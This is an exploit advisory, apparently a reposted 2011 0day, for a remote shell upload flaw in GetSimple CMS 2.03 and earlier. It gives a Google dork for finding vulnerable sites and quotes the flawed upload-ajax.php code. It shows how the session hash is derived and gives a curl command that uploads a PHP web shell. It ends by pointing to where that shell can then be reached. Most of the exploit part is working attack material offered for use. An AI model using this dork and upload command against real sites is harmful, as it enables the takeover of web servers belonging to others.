GetSimple CMS <=2.03 Remote Upload Shell (Upload-Ajax.php) 0day 2011-02-16 00:06:04
Inviato da: reflective

# Exploit Title: GetSimple CMS &lt;=2.03 Remote Upload Shell (0day)
# Google Dork: &quot;powered by GetSimple Version 2.03&quot;
# Date: 15/FEB/2011
# Author: s3rg3770 and Chuzz (irc.azzurra.org #hackerjournal)
# Site Author: http://reflective.noblogs.org (OWL?)

(o\ /o)
-----`&quot;&quot; &quot;&quot;`-----

# Software Link: http://get-simple.info/
# Version: 2.0.3
# Tested on: *nix


What a Fuck? SESSIONHASH for upload a file? It's a bacon's security...

Bug Code:

if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
if (!empty($_FILES))
$tempFile = $_FILES['Filedata']['tmp_name'];
$name = clean_img_name($_FILES['Filedata']['name']);
$targetFile = str_replace(&lsquo;//&rsquo;,'/&rsquo;,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);

Generating SESSIONHASH: md5( $salt. $sitename)

curl -F &ldquo;[email protected];filename=shell.php&rdquo; http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO

After, enjoy your Bacon-Shell here ...http://getsimple_localhost/data/uploads/shell.php

Thanks to my ASCELL...